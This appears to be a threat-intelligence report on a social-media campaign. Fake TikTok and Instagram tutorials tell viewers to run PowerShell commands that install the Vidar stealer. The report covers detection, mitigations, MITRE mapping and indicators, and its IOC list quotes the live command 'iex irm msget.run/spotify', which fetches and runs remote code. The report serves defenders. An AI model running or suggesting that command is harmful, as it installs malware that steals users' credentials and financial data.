Phishing Attacks Leverage TikTok, Instragram Reels

What Happened

Scammers are using popular social media apps like TikTok and Instagram to trick people into downloading harmful software. They post fake tutorial videos promising free access to premium apps like Spotify, which actually instruct viewers to run commands that install malware or visit scam websites. This is dangerous because the videos look professional and reach a massive audience through the platforms' recommendation algorithms. Users should be cautious of 'too good to be true' software offers on social media and organizations should train employees to recognize these unconventional phishing methods.

Key Takeaways

• Threat actors are using TikTok and Instagram Reels to distribute malware via fake software tutorials.
• One campaign uses AI-generated voiceovers instructing users to execute malicious PowerShell commands to download Vidarstealer.
• Another campaign uses engagement-baiting (asking for comments) to direct users to malicious survey sites or software downloads.
• The attacks exploit social media recommendation algorithms to reach hundreds of thousands of users.

Affected Systems

• Windows OS

Attack Chain

Attackers post short-form videos on TikTok and Instagram Reels disguised as tutorials for obtaining free premium software. The videos instruct users to open PowerShell and execute a remote script using the iex irm command. Once executed, the script downloads and runs an executable payload, identified as Vidarstealer, which proceeds to steal credentials and financial information from the victim's device. Alternatively, attackers use engagement-baiting videos to direct users to malicious websites that host fake surveys or further malware downloads.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No

The article does not provide specific detection rules, but mentions analysis was performed using ReversingLabs Spectra Analyze.

Detection Engineering Assessment

EDR Visibility: High — EDR solutions have strong visibility into PowerShell execution, especially commands utilizing iex (Invoke-Expression) and irm (Invoke-RestMethod) to download remote payloads. Network Visibility: Medium — Network monitoring can detect connections to suspicious domains like msget.run, but the initial vector (social media traffic) is encrypted and blends with legitimate usage. Detection Difficulty: Moderate — While the PowerShell execution is easily detectable, the initial social engineering vector occurs outside corporate control on personal or unmonitored social media platforms.

Required Log Sources

• Process Creation (Event ID 4688)
• PowerShell Script Block Logging (Event ID 4104)
• DNS Query Logs

Hunting Hypotheses

Control Gaps

• Lack of visibility into personal social media usage on BYOD devices
• Insufficient restrictions on PowerShell execution for standard users

Key Behavioral Indicators

• PowerShell executing iex irm with external URLs
• Unexpected execution of build.exe or similarly generic named executables from temporary directories

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Verify against your organization's incident response runbook and team escalation paths before acting.
• Consider blocking the identified malicious domains (e.g., msget.run, d4ug.site) at the network perimeter.
• Evaluate whether to restrict PowerShell execution for non-administrative users.

Infrastructure Hardening

• Consider implementing application control to prevent the execution of unapproved binaries like the downloaded Vidarstealer payload.
• If supported by your environment, enforce PowerShell Constrained Language Mode to limit the capabilities of potentially malicious scripts.

User Protection

• Evaluate whether to restrict access to social media platforms on corporate devices if not required for business purposes.
• Consider auditing local administrator privileges to ensure users cannot easily install unauthorized software.

Security Awareness

• Consider updating security awareness training to include examples of social media-based phishing and fake software tutorials.
• Encourage employees to report suspicious social media content, even when encountered on personal devices.

MITRE ATT&CK Mapping

• T1566.002 - Phishing: Spearphishing Link
• T1059.001 - Command and Scripting Interpreter: PowerShell
• T1204.002 - User Execution: Malicious File
• T1539 - Steal Web Session Cookie
• T1555 - Credentials from Password Stores

Additional IOCs

• Domains:
  • slmgr[.]sh - Malicious domain listed in IOCs
  • ms[.]get - Malicious domain listed in IOCs (likely typo of msget.run)
• Urls:
  • msget.run/spotify - URL used in malicious PowerShell command to download payload
  • tiktok.com/@windows.tips1 - Malicious TikTok account
  • tiktok.com/@windows.insight - Malicious TikTok account
  • tiktok.com/@davidcooksey47 - Malicious TikTok account
  • tiktok.com/@tracyhughe - Malicious TikTok account
  • tiktok.com/@mr.capcut.pro2 - Malicious TikTok account
  • instagram.com/wtips404 - Malicious Instagram account
  • instagram.com/wndwstips - Malicious Instagram account
  • instagram.com/epemberton369 - Malicious Instagram account
• File Hashes:
  • 8cc4649a0f87a927d999ec352a65d88a0335a3cf (SHA1) - Vidarstealer payload (build.exe)
• File Paths:
  • build.exe - Filename of the downloaded Vidarstealer payload
  • frequently_v1.0.0.0.exe - Alternative filename associated with the Vidarstealer payload
• Command Lines:
  • Purpose: Download and execute malicious script from remote server | Tools: PowerShell | Stage: Execution | iex irm msget.run/spotify